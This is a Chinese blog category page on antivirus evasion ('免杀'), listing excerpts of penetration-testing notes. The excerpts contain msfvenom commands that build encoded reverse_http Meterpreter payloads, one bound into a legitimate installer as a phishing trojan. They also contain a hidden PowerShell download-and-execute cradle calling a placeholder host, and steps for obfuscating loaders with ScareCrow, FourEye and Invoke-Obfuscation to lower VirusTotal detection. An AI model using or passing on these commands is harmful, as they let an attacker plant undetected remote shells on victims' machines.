免杀
文章平均质量分 53
AA8j
Who Am I-Kein System ist sicher
展开
-
【渗透测试笔记】之【Python免杀——两行代码免杀。VT查杀率:10/68(思路:将ShellCode和Loader一起分离免杀)】
文章目录1. shellcode Loader1.1 生成shellcode1.2 shellcode loader 脚本上线测试1.3 使用pyinstaller生成exe文件上线测试1.4 VT查杀率:24/682. ShellCode 分离2.1 上传加密后的shellcode2.2 改写shellcode loader2.3 shellcode 分离后shellcode loader脚本上线测试2.4 shellcode 分离后,使用pyinstaller生成exe文件上线测试2.5 VT查杀率:1原创 2021-10-24 19:59:18 · 6000 阅读 · 1 评论 -
【渗透测试笔记】之【免杀工具——ScareCrow】
项目地址https://github.com/optiv/ScareCrow安装方法首先安装:golang、openssl、osslsigncode、mingw-w64apt install golang openssl osslsigncode mingw-w64 -y下载源码:https://github.com/optiv/ScareCrow/tags进入根目录编译go env -w GOPROXY=https://goproxy.cn# 使用国内原go build Sca原创 2021-08-02 17:08:15 · 1120 阅读 · 0 评论 -
【渗透测试笔记】之【钓鱼姿势——exe捆绑与免杀】
准备被捆绑程序:输入:msfvenom -p windows/meterpreter/reverse_http lhost=x.x.x.x lport=55555 -e x86/shikata_ga_nai -i 15 -f exe -b '\x00\x0a\x0d' -x ~/Desktop/inst.exe > ~/Desktop/Trojan/test_msf_360.exe目标主机执行,成功上线:...原创 2021-07-06 17:57:39 · 6080 阅读 · 0 评论 -
【渗透测试笔记】之【免杀工具——msfvenom+FourEye】
利用msfvenom生成shellcode:msfvenom -p windows/meterpreter/reverse_http lhost=x.x.x.x lport=44444 -e x86/shikata_ga_nai -i 10 -f raw -b '\x00\x0a\x0d' > ~/Desktop/Trojan/test.bin利用FourEye生成exe:FourEye >>shellcodeFourEye(shellcode) >>1F.原创 2021-07-06 08:46:32 · 543 阅读 · 0 评论 -
【渗透测试笔记】之【免杀工具——使用Invoke-Obfuscation代码混淆免杀powershell】
0x01 项目地址https://github.com/danielbohannon/Invoke-Obfuscation0x02 用法生成powershell:powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x:55556/a'))"下载并用powershell进入项目目录执行:Import-Module .\Invoke-Obfuscati原创 2021-07-06 17:30:27 · 2168 阅读 · 0 评论